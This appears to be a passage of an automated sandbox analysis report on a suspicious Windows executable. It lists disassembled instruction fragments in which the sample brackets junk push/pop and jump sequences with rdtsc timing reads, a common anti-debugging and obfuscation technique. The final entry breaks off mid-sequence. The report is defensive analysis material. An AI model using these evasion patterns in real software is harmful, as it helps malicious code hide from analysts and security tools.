Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4D951F second address: 4D9541 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FE6E8F184B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnl 00007FE6E8F184BEh 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 jg 00007FE6E8F184B6h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4D9B54 second address: 4D9B58 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4D9B58 second address: 4D9B64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4D9B64 second address: 4D9B6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4D9B6A second address: 4D9B7C instructions: 0x00000000 rdtsc 0x00000002 jc 00007FE6E8F184B6h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4D9B7C second address: 4D9B95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push edx 0x00000006 jmp 00007FE6E8B29091h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4D9B95 second address: 4D9B9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4D9B9A second address: 4D9BA2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4D9D36 second address: 4D9D57 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8F184C2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jc 00007FE6E8F184B6h 0x00000010 push esi 0x00000011 pop esi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4D9E98 second address: 4D9E9E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4D9E9E second address: 4D9EA3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4D9EA3 second address: 4D9EAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4DA30A second address: 4DA345 instructions: 0x00000000 rdtsc 0x00000002 je 00007FE6E8F184B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007FE6E8F184C2h 0x00000012 pop eax 0x00000013 jmp 00007FE6E8F184BFh 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FE6E8F184BAh 0x0000001f rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4DA345 second address: 4DA349 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4DFABC second address: 4DFAC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jnp 00007FE6E8F184B6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4E52D6 second address: 4E52FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8B29099h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4E52FB second address: 4E5305 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FE6E8F184B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4E44C6 second address: 4E44CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4E8F9A second address: 4E8F9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4E8F9E second address: 4E8FB9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FE6E8B29095h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4E8FB9 second address: 4E8FCC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8F184BBh 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4E82C3 second address: 4E82C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4E82C9 second address: 4E82D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FE6E8F184B6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4E82D4 second address: 4E82DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4E82DA second address: 4E830E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8F184C5h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c jmp 00007FE6E8F184C6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4E8478 second address: 4E847C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4E847C second address: 4E84A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FE6E8F184C3h 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007FE6E8F184BFh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4E84A8 second address: 4E84B2 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FE6E8B29086h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4E84B2 second address: 4E84D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a jmp 00007FE6E8F184C1h 0x0000000f jl 00007FE6E8F184B6h 0x00000015 pop ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 pop eax 0x0000001a rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4E84D8 second address: 4E84EB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8B2908Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4E84EB second address: 4E8501 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE6E8F184BCh 0x00000009 jg 00007FE6E8F184B6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4E86D3 second address: 4E86D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4E86D8 second address: 4E86E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4E86E0 second address: 4E86E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4E86E9 second address: 4E86ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4E86ED second address: 4E86F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4E8B4A second address: 4E8B4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4E8B4F second address: 4E8B5B instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FE6E8B2908Eh 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4E8CC8 second address: 4E8CE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 ja 00007FE6E8F184B8h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jc 00007FE6E8F184B6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4E8CE1 second address: 4E8CE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4E8CE7 second address: 4E8CEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4E8E19 second address: 4E8E26 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FE6E8B29086h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4EA381 second address: 4EA39F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8F184BFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jl 00007FE6E8F184B6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4EA39F second address: 4EA3A9 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FE6E8B29086h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4EA3A9 second address: 4EA3B3 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FE6E8F184BCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4EA3B3 second address: 4EA3C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push ecx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4EA3C3 second address: 4EA3EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 mov eax, dword ptr [eax] 0x00000008 push ebx 0x00000009 jmp 00007FE6E8F184C8h 0x0000000e pop ebx 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 push ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4EA3EE second address: 4EA3F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4EA3F2 second address: 4EA423 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 pop eax 0x00000008 mov esi, dword ptr [ebp+122D2D4Ch] 0x0000000e call 00007FE6E8F184B9h 0x00000013 jmp 00007FE6E8F184C5h 0x00000018 push eax 0x00000019 pushad 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4EA423 second address: 4EA467 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE6E8B29099h 0x00000009 popad 0x0000000a pushad 0x0000000b push edx 0x0000000c pop edx 0x0000000d je 00007FE6E8B29086h 0x00000013 popad 0x00000014 popad 0x00000015 mov eax, dword ptr [esp+04h] 0x00000019 jmp 00007FE6E8B2908Fh 0x0000001e mov eax, dword ptr [eax] 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4EA467 second address: 4EA46B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4EA46B second address: 4EA475 instructions: 0x00000000 rdtsc 0x00000002 je 00007FE6E8B29086h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4EA8FE second address: 4EA90F instructions: 0x00000000 rdtsc 0x00000002 js 00007FE6E8F184B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4EA90F second address: 4EA91A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FE6E8B29086h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4EAB56 second address: 4EAB5A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4EAF44 second address: 4EAF59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jnl 00007FE6E8B2908Ch 0x0000000f ja 00007FE6E8B29086h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4EAF59 second address: 4EAF5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4EAF5F second address: 4EAF63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4EAFE4 second address: 4EB02C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 xchg eax, ebx 0x00000006 mov esi, dword ptr [ebp+122D2DB0h] 0x0000000c jl 00007FE6E8F184BCh 0x00000012 sub dword ptr [ebp+122D2862h], eax 0x00000018 nop 0x00000019 jmp 00007FE6E8F184C3h 0x0000001e push eax 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007FE6E8F184C9h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4EB385 second address: 4EB38B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4EB38B second address: 4EB3A0 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FE6E8F184B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4EB3A0 second address: 4EB3A5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4EB452 second address: 4EB456 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4EB456 second address: 4EB470 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007FE6E8B29088h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f push eax 0x00000010 je 00007FE6E8B29094h 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4EB470 second address: 4EB474 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4EBA9E second address: 4EBAA2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4EBAA2 second address: 4EBB10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 jmp 00007FE6E8F184BBh 0x0000000d nop 0x0000000e pushad 0x0000000f or dword ptr [ebp+122D24D0h], ebx 0x00000015 mov bx, 2D17h 0x00000019 popad 0x0000001a pushad 0x0000001b jmp 00007FE6E8F184BEh 0x00000020 xor dword ptr [ebp+122D34F6h], eax 0x00000026 popad 0x00000027 push 00000000h 0x00000029 push 00000000h 0x0000002b push ecx 0x0000002c call 00007FE6E8F184B8h 0x00000031 pop ecx 0x00000032 mov dword ptr [esp+04h], ecx 0x00000036 add dword ptr [esp+04h], 0000001Ch 0x0000003e inc ecx 0x0000003f push ecx 0x00000040 ret 0x00000041 pop ecx 0x00000042 ret 0x00000043 push 00000000h 0x00000045 mov edi, dword ptr [ebp+122D2B7Ch] 0x0000004b push eax 0x0000004c push edx 0x0000004d jc 00007FE6E8F184BCh 0x00000053 push eax 0x00000054 push edx 0x00000055 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4ED4A1 second address: 4ED4A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4ED4A5 second address: 4ED4D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jmp 00007FE6E8F184C8h 0x0000000c pop edx 0x0000000d popad 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jp 00007FE6E8F184BCh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4ED4D5 second address: 4ED4DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007FE6E8B29086h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4EDF95 second address: 4EDF9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4EDC89 second address: 4EDC8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4EE889 second address: 4EE89B instructions: 0x00000000 rdtsc 0x00000002 jc 00007FE6E8F184B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jng 00007FE6E8F184B6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4EE89B second address: 4EE8D6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8B29094h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d xor esi, dword ptr [ebp+122D2A24h] 0x00000013 push 00000000h 0x00000015 pushad 0x00000016 mov dword ptr [ebp+122D2A2Dh], edi 0x0000001c stc 0x0000001d popad 0x0000001e push 00000000h 0x00000020 mov edi, dword ptr [ebp+122D2EA0h] 0x00000026 push eax 0x00000027 push ecx 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4EE8D6 second address: 4EE8DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4EF113 second address: 4EF119 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4EFF5E second address: 4EFF64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4F091F second address: 4F0925 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4F0925 second address: 4F092A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4F474C second address: 4F4751 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4F1153 second address: 4F1158 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4F4E59 second address: 4F4E5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4F5FC0 second address: 4F5FC5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4FA26F second address: 4FA27A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4F4F6A second address: 4F4F6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4FA27A second address: 4FA285 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4F4F6E second address: 4F4F74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4FA285 second address: 4FA2F7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 jmp 00007FE6E8B29097h 0x0000000d mov dword ptr [ebp+122D36B7h], esi 0x00000013 push 00000000h 0x00000015 call 00007FE6E8B29094h 0x0000001a pushad 0x0000001b movsx eax, bx 0x0000001e mov ax, B2BFh 0x00000022 popad 0x00000023 pop ebx 0x00000024 push 00000000h 0x00000026 push 00000000h 0x00000028 push ebx 0x00000029 call 00007FE6E8B29088h 0x0000002e pop ebx 0x0000002f mov dword ptr [esp+04h], ebx 0x00000033 add dword ptr [esp+04h], 00000018h 0x0000003b inc ebx 0x0000003c push ebx 0x0000003d ret 0x0000003e pop ebx 0x0000003f ret 0x00000040 mov ebx, dword ptr [ebp+122D32CCh] 0x00000046 push eax 0x00000047 push edi 0x00000048 pushad 0x00000049 push eax 